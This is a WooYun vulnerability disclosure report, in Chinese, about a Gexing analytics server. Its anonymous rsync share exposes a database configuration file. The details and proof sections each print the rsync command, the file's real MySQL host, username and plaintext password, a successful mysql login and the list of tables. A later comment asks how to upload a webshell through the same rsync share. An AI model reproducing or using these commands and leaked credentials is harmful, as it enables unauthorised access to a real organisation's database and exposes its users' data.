当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041277

漏洞标题:个性网数据分析用数据库配置文件外泄

相关厂商:个性网

漏洞作者: 盈盈无绪

提交时间:2013-10-28 16:26

修复时间:2013-12-12 16:27

公开时间:2013-12-12 16:27

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

配置文件可读到,且mysql用户授权没有限制来源ip.

详细说明:

rsync 211.154.219.72::analytics.gexing.com/config/dbconf.php .
dbconf.php
::::::::::::::
<?php
$_SERVER['db_conf'] = array(
		'gxanalytics' => array(
				 'host' =>'211.154.255.103',
				 'port' =>'3306',
				 'user'=>'gxanalyticsuser',
				 'passwd'=>'woainiya@2012'
				)
		);
// redis
$_SERVER['CONFIG']['redis'] = array(
        'master' => array(
            'wwwhotsearchcount' => array(
                'host' => '211.154.255.103',
                'port' => '6379'
            )
        )
);
mysql -h211.154.255.103 -ugxanalyticsuser -pwoainiya@2012
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 48728435
Server version: 5.1.49-3-log (Debian)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show tables;
+------------------------------+
| Tables_in_gxanalytics        |
+------------------------------+
| 3gdayuv                      |
| 3gpv                         |
| android7dayuv                |
| androidactioncount           |
| androidclienttype            |
| androiddayuv                 |
| androiddownloadcount         |
| androidpv                    |
| androidvisittype             |
| attentioncountratio          |
| contentpublishcount          |
| emailauthcount               |
| gexingspecialdaycount        |
| gexingspecialdaytotal        |
| goldcountcurrent             |
| jzbbspostcount               |
| jzuseractioncount            |
| moodpublishcount             |
| newuserregcount              |
| newzoneusercount             |
| phpslowcount                 |
| phpslowdetail                |
| phpslowdomaincount           |
| pvtoarea                     |
| qqbindcount                  |
| redisdayused                 |
| redisusedtotal               |
| smsbusinesslist              |
| smssendlist                  |
| specialcodelist              |
| www500count                  |
| www500detail                 |
| wwwactiontalentcount         |
| wwwattentioncount            |
| wwwcolumnlistviewcount       |
| wwwcolumnvisitcount          |
| wwwdayhouruv                 |
| wwwdayip                     |
| wwwdaypv                     |
| wwwdayuv                     |
| wwwhotsearchcount            |
| wwwpublishcount              |
| wwwspecialpagevisitcount     |
| wwwuniquechangeinfousercount |
| wwwuniqueloginusercount      |
| wwwweekloginusercount        |
| zoneactiveusercount          |
| zonemoodusercount            |
| zoneonlineusercount          |
| zoneuniqueloginusercount     |
| zuoyeuniqueloginusercount    |
| zyactioncount                |
+------------------------------+
52 rows in set (0.21 sec)


漏洞证明:

rsync 211.154.219.72::analytics.gexing.com/config/dbconf.php .
dbconf.php
::::::::::::::
<?php
$_SERVER['db_conf'] = array(
		'gxanalytics' => array(
				 'host' =>'211.154.255.103',
				 'port' =>'3306',
				 'user'=>'gxanalyticsuser',
				 'passwd'=>'woainiya@2012'
				)
		);
// redis
$_SERVER['CONFIG']['redis'] = array(
        'master' => array(
            'wwwhotsearchcount' => array(
                'host' => '211.154.255.103',
                'port' => '6379'
            )
        )
);
mysql -h211.154.255.103 -ugxanalyticsuser -pwoainiya@2012
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 48728435
Server version: 5.1.49-3-log (Debian)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show tables;
+------------------------------+
| Tables_in_gxanalytics        |
+------------------------------+
| 3gdayuv                      |
| 3gpv                         |
| android7dayuv                |
| androidactioncount           |
| androidclienttype            |
| androiddayuv                 |
| androiddownloadcount         |
| androidpv                    |
| androidvisittype             |
| attentioncountratio          |
| contentpublishcount          |
| emailauthcount               |
| gexingspecialdaycount        |
| gexingspecialdaytotal        |
| goldcountcurrent             |
| jzbbspostcount               |
| jzuseractioncount            |
| moodpublishcount             |
| newuserregcount              |
| newzoneusercount             |
| phpslowcount                 |
| phpslowdetail                |
| phpslowdomaincount           |
| pvtoarea                     |
| qqbindcount                  |
| redisdayused                 |
| redisusedtotal               |
| smsbusinesslist              |
| smssendlist                  |
| specialcodelist              |
| www500count                  |
| www500detail                 |
| wwwactiontalentcount         |
| wwwattentioncount            |
| wwwcolumnlistviewcount       |
| wwwcolumnvisitcount          |
| wwwdayhouruv                 |
| wwwdayip                     |
| wwwdaypv                     |
| wwwdayuv                     |
| wwwhotsearchcount            |
| wwwpublishcount              |
| wwwspecialpagevisitcount     |
| wwwuniquechangeinfousercount |
| wwwuniqueloginusercount      |
| wwwweekloginusercount        |
| zoneactiveusercount          |
| zonemoodusercount            |
| zoneonlineusercount          |
| zoneuniqueloginusercount     |
| zuoyeuniqueloginusercount    |
| zyactioncount                |
+------------------------------+
52 rows in set (0.21 sec)


修复方案:

授权要严谨

版权声明:转载请注明来源 盈盈无绪@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2014-05-22 20:23 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    怎么用rsync把马传上去?

  2. 2014-05-22 20:28 | m_vptr ( 普通白帽子 | Rank:133 漏洞数:30 | 新手)

    这个rsync问题一直没修复...

  3. 2014-05-22 21:25 | j2ck3r ( 普通白帽子 | Rank:406 漏洞数:92 | 别关注我,跟你不熟。)

    @m_vptr 因为没有找到厂商